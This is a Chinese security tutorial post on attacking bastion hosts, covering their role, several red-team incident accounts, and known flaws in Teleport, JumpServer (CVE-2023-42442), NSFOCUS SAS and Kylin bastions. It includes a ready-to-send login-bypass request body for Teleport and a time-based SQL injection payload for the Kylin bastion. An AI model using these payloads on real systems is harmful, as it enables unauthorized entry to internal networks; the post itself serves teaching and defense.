当前位置: 首页 > news >正文

云上攻防-云产品篇堡垒机场景JumpServer绿盟SASTeleport麒麟齐治

知识点

1、云产品-堡垒机-产品介绍&攻击事件
2、云产品-堡垒机-安全漏洞&影响产品

章节点:
云场景攻防:公有云,私有云,混合云,虚拟化集群,云桌面等
云厂商攻防:阿里云,腾讯云,华为云,亚马云,谷歌云,微软云等
云服务攻防:对象存储,云数据库,弹性计算服务器,VPC&RAM等
云原生攻防:Docker,Kubernetes(k8s),容器逃逸,CI/CD等

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

一、演示案例-云产品-堡垒机-产品介绍&攻击事件

堡垒机攻防:(意义)

https://mp.weixin.qq.com/s/-WcgyVoTCZuPamVtI5MrJw

堡垒机漏洞:(已知)

https://avd.aliyun.com/search?q=%E5%A0%A1%E5%9E%92%E6%9C%BA

云堡垒机:(云攻防)

https://blog.csdn.net/weixin_43025343/article/details/132537328

常见安全设备漏洞:(举一反三)

https://blog.csdn.net/sinat_35360663/article/details/127606875

在这里插入图片描述

堡垒机意义:
1、管理者期望:统⼀⼊⼝、批量管理、⾃动运维、安全运营
2、堡垒机4A能⼒:身份鉴别、帐号管理、权限控制、安全审计介绍:堡垒机是种网络安全设备,用于保护和管理企业内部网络与外部网络之间的访问。它作为一种中间节点,提供安全的访问控制和审计功能,用于保护内部网络免受未经授权的访问和攻击。堡垒机通常被用作跳板服务器,即堡垒机来管理和访问其他内部服务器。攻击面:堡垒机作为外网进入内网的重要门户,对于维护内网安全起着举足轻重的作用。然而在攻击场景中,它也成为攻击者的必争之地。如果攻击者获得堡垒机权限,那么攻击者就可获得进入内网,甚至是直接管理堡垒机上所有的资产。一般而言,黑客可能尝试通过漏洞利用或社会工程学等手段获取堡垒机的访问权限。2021年攻防演练期间,某大型国企因为jumpserver堡垒机遭受攻击,导致内网大量机器失陷。攻击者利用jumpserver堡垒机的远程命令执行漏洞进行攻击,导致攻击者绕过层层防御进入目标企业内网。攻击者通过操纵由jumpserver堡垒机管理的内网机器,以这台机器为据点,对内网进行信息收集,不断地横向渗透,最终控制了大量内网机器。2021年攻防演练期间,某互联网公司堡垒机遭受攻击,攻击者利用任意用户登录漏洞对齐治堡垒机实施攻击,获得齐治堡垒机的后台管理权限,控制了大量内网机器。通过逐步对内网进行渗透,最终通过域控的一高危漏洞成功地获得域控权限,至此完全控制AD域。2022年攻防演练期间,某大型国企堡垒机遭受网络攻击,最终提前退出演练。攻击者利用天玥堡垒机存在的弱口令漏洞获得堡垒机的web控制台权限,逐步渗透到企业内部网络。攻击者在内网中进行横向移动攻击,控制大量的企业计算机,同时获取到了大量敏感信息,包括企业员工个人信息、源代码等。最终导致企业大量失分,不得不中途退出演练。

二、演示案例-云产品-堡垒机-安全漏洞&影响产品

1、Teltport(小型)-任意用户登录

官网:https://www.tp4a.com/
在这里插入图片描述
在这里插入图片描述

post:/auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"xxxx","oath":"","remember":false}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、JumpServer(用的比较多)-CVE-2023-42442 未授权访问漏洞复现

官网:https://www.jumpserver.org/
在这里插入图片描述
CVE-2023-42442 JumpServer未授权访问漏洞复现
参考文章:https://mp.weixin.qq.com/s/NCSnTsOMxslmf5S6d9896A
在这里插入图片描述

3、绿盟SAS堡垒机-任意用户登录漏洞

参考文章:https://mp.weixin.qq.com/s/CtswTTvuzyQXuUNMKzRHBg

4、麒麟堡垒机-sql注入

参考文章:https://blog.csdn.net/qq_41904294/article/details/132328217

Post:constr=1' AND (SELECT 6999 FROM (SELECT(SLEEP(10)))ptGN) AND'AAdm'='AAdm&title=%40127.0.0.1

在这里插入图片描述
在这里插入图片描述

相关文章:

  • 异步编程实战:使用C#实现FTP文件下载及超时控制
  • 代码详解:2024美团春招实习笔试第一场0309,是难还是简单?
  • 微信小程序如何实现下拉刷新
  • 利用SQL Server 进行报表统计的关键SQL语句与函数
  • Elasticsearch从入门到精通-03基本语法学习
  • FFmpeg--解封装流程
  • 【Linux-磁盘管理】
  • DataGrip 连接 Centos MySql失败
  • “typescript“ “type predicate“ 陷阱记录
  • 牛客周赛 Round 36
  • 代码随想录刷题笔记 DAY 42 | 最后一块石头的重量 II No.1049 | 目标和 No.494 | 一和零 No.474
  • Unity使用Addressable热更新
  • 华为evpn简单配置案例
  • 【FAQ】HarmonyOS SDK 闭源开放能力 —Map Kit
  • c++之迭代器与反向迭代器
  • JavaScript-如何实现克隆(clone)函数
  • emacs初体验
  • ES学习笔记(10)--ES6中的函数和数组补漏
  • happypack两次报错的问题
  • iBatis和MyBatis在使用ResultMap对应关系时的区别
  • isset在php5.6-和php7.0+的一些差异
  • Javascript 原型链
  • LintCode 31. partitionArray 数组划分
  • Linux编程学习笔记 | Linux IO学习[1] - 文件IO
  • React-flux杂记
  • Vue组件定义
  • Web设计流程优化:网页效果图设计新思路
  • 阿里云前端周刊 - 第 26 期
  • 对象管理器(defineProperty)学习笔记
  • 微信支付JSAPI,实测!终极方案
  • 译自由幺半群
  • 栈实现走出迷宫(C++)
  • 你对linux中grep命令知道多少?
  • 《天龙八部3D》Unity技术方案揭秘
  • 支付宝花15年解决的这个问题,顶得上做出十个支付宝 ...
  • ​无人机石油管道巡检方案新亮点:灵活准确又高效
  • !! 2.对十份论文和报告中的关于OpenCV和Android NDK开发的总结
  • # 透过事物看本质的能力怎么培养?
  • #传输# #传输数据判断#
  • #图像处理
  • $HTTP_POST_VARS['']和$_POST['']的区别
  • (1)SpringCloud 整合Python
  • (附源码)spring boot网络空间安全实验教学示范中心网站 毕业设计 111454
  • (附源码)ssm经济信息门户网站 毕业设计 141634
  • (六)激光线扫描-三维重建
  • (转)机器学习的数学基础(1)--Dirichlet分布
  • ***微信公众号支付+微信H5支付+微信扫码支付+小程序支付+APP微信支付解决方案总结...
  • .a文件和.so文件
  • .bat批处理(七):PC端从手机内复制文件到本地
  • .NET Core 网络数据采集 -- 使用AngleSharp做html解析
  • .NET/C# 利用 Walterlv.WeakEvents 高性能地中转一个自定义的弱事件(可让任意 CLR 事件成为弱事件)
  • .NET开源全面方便的第三方登录组件集合 - MrHuo.OAuth
  • .py文件应该怎样打开?
  • /usr/bin/perl:bad interpreter:No such file or directory 的解决办法
  • @Responsebody与@RequestBody